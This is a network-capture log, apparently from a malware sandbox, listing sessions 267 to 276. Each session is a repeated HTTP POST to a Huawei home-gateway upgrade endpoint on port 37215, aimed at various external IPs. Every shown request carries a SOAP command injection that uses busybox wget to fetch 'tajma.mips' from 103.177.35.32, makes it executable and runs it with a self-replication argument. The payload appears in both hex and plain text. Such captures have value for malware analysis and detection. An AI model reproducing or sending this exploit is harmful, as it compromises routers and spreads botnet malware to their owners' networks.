                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        267192.168.2.233468641.142.113.16037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316376925 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        268192.168.2.2342176197.216.2.7737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316412926 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        269192.168.2.235131041.185.117.17537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316498041 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        270192.168.2.2349444197.63.144.16737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316498995 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        271192.168.2.2339048197.242.18.25237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316499949 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        272192.168.2.2346192114.163.10.6537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316509008 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        273192.168.2.2354176157.216.90.9437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316509962 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        274192.168.2.235001691.186.233.1137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316514969 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        275192.168.2.2356444197.253.93.10537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316526890 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        276192.168.2.234407041.133.212.9737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316533089 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
